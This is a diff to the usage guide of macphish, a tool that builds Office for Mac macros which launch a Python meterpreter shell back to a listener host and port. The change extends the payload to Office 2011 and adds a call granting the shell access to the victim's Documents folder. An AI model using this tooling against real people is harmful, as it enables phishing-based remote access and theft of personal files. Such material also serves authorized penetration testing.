cldrn/macphish/USAGE.md

     $./macphish.py -a meterpreter -lh <host> -lp <port> -p <payload type> -m

-## meterpreter-grant (Office 2016)
+## meterpreter-grant (Office 2011/Office 2016)

-This payload executes a Python meterpreter.
+This payload executes a Python meterpreter after calling GrantAccessToMultipleFiles(/Users/<user>/Documents).
+The meterpreter shell will have access to user documents if permissions are granted.
+Additionally, the document must be run from anywhere (including subfolders) inside the Documents folder.

 To generate a macro that will execute a Python meterpreter payload (Note that only Python payloads will work):